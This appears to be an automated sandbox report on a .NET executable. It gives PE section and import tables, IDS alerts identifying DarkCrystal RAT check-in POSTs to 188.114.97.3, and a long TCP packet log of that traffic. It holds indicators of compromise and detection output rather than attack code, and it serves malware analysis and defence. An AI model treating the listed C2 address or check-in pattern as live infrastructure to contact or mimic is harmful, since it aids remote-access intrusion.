                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    Name                                  Virtual Address  Virtual Size  Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT          0x1d46b0         0x4b          .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1d6000         0x320         .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1d8000         0xc           .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                    Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                                    .text   0x2000           0x1d2704      0x1d2800  c348f17490abd78a407642d0cb98f772  False     0.7776959614482851  data       7.539794011288274    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc   0x1d6000         0x320         0x400     3720f37e3ecb95f78fcf18a649002524  False     0.3525390625        data       2.6537284131589467   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .reloc  0x1d8000         0xc           0x200     41e1aa82ccda9ea401b1860955233b34  False     0.041015625         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    Name        RVA       Size   Type  Language  Country  ZLIB Complexity
                                                    RT_VERSION  0x1d6058  0x2c8  data                     0.46207865168539325
                                                    DLL          Import
                                                    mscoree.dll  _CorExeMain
                                                    Timestamp                 Protocol  SID      Message                                                Source Port  Dest Port  Source IP     Dest IP
                                                    07/03/24-16:42:09.488839  TCP       2048095  ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)    49707        80         192.168.2.10  188.114.97.3
                                                    07/03/24-16:43:02.458952  TCP       2048095  ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)    49785        80         192.168.2.10  188.114.97.3
                                                    07/03/24-16:43:34.748698  TCP       2048095  ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)    49830        80         192.168.2.10  188.114.97.3
                                                    Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                    Jul 3, 2024 16:42:15.232995987 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.236922979 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.236943960 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237096071 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237104893 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237116098 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237154961 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237164021 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237173080 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237267971 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237354994 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237363100 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237404108 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237412930 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237488031 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237529993 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237540007 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237596035 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237704039 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237714052 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237721920 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237756014 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237765074 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237931013 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.237976074 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238081932 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238152027 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238162994 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238178015 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238277912 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238289118 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238336086 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238404036 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238415003 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238431931 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238502026 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238512039 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238611937 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238672972 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238682032 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238689899 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238733053 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238742113 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238786936 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238909960 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238919020 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238926888 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238965988 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.238975048 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239017963 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239145041 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239154100 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239161015 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239171982 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239180088 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239306927 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239370108 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239378929 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.239804029 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.273272038 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.308759928 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.323924065 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.325289965 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.330410957 CEST8049714188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.330519915 CEST4971480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.331698895 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.331779957 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.332123041 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.338761091 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.416306973 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.682183027 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:15.687172890 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.781455994 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:15.822570086 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.129295111 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.213160992 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.278706074 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.279670000 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.284337997 CEST8049716188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.284395933 CEST4971680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.285212040 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.285290956 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.285402060 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.291227102 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.435770988 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.525665998 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.635624886 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.641309023 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.745060921 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:16.801539898 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:16.949011087 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.025659084 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.077045918 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.077164888 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.078006029 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.092133045 CEST8049715188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.092148066 CEST8049719188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.092160940 CEST8049722188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.092187881 CEST4971580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.092220068 CEST4971980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.092252016 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.092459917 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.101618052 CEST8049722188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.387125969 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.392071009 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.392155886 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.392743111 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.397578001 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.408371925 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.454623938 CEST8049722188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.468975067 CEST8049722188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.469286919 CEST4972280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.565318108 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.575295925 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.576411963 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.579336882 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.584363937 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.744534969 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.751724958 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.751749992 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.868181944 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.932447910 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:17.937685966 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:17.994554996 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.051175117 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.181950092 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.210037947 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.294574022 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.397026062 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.478873968 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.563393116 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.563395023 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.564426899 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.569370031 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.569436073 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.569711924 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.572052956 CEST8049723188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.572066069 CEST8049724188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.572120905 CEST4972380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.572134018 CEST4972480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.577904940 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:18.916588068 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:18.922349930 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.021759033 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.088186979 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.390098095 CEST8049728188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.479408979 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.516562939 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.523878098 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.523982048 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.524100065 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.528983116 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.869524002 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:19.875020981 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:19.990917921 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.088148117 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.323458910 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.450001955 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.450624943 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.455566883 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.455646992 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.455785036 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.460613966 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.472368956 CEST8049729188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.476275921 CEST4972980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.811794043 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:20.817056894 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.931277037 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:20.994399071 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.262813091 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.401215076 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.401938915 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.406346083 CEST8049730188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.406409979 CEST4973080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.406774044 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.406837940 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.406968117 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.411751032 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.760194063 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:21.765234947 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.859070063 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:21.994381905 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.196830988 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.291264057 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.325340033 CEST4972880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.326114893 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.327132940 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.332595110 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.332659960 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.332765102 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.332878113 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.333447933 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.337796926 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.682444096 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.687310934 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.794450045 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.978790998 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.141895056 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.216680050 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.222104073 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.222171068 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.222450018 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.227879047 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.230195999 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.230293036 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.357163906 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.366344929 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.366961002 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.367151022 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.374411106 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.572700977 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.689896107 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.690681934 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.691099882 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.713455915 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.719759941 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.791394949 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.825880051 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.978780031 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.117372990 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.172522068 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.291297913 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.291425943 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.292030096 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.292040110 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.292104006 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.292999983 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.297318935 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.297384024 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.297987938 CEST8049735188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.298062086 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.298254967 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.299014091 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.299066067 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.299068928 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.307719946 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.314568996 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.429552078 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.478873014 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.761842012 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.806984901 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.873460054 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.873877048 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.878859997 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.878948927 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.879108906 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.879153967 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.879201889 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.883976936 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.887316942 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.894352913 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.894424915 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.894560099 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.901452065 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.229017973 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.234153032 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.244633913 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.250379086 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.368227005 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.374855042 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.416299105 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.416347980 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.549978018 CEST4975380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.556168079 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.565320015 CEST8049759188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.565382004 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.565844059 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.571711063 CEST8049759188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.707231045 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.708854914 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.727539062 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.732168913 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.732255936 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.733424902 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.733475924 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.754707098 CEST8049759188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.760070086 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.855001926 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.855880022 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.860419035 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.860518932 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.860755920 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.860830069 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.860985041 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.865806103 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.956787109 CEST8049759188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.956908941 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.213357925 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.218813896 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:43.326652050 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:43.369477987 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.668684959 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:43.713184118 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.790577888 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.797107935 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:43.797177076 CEST4976180192.168.2.10188.114.97.3
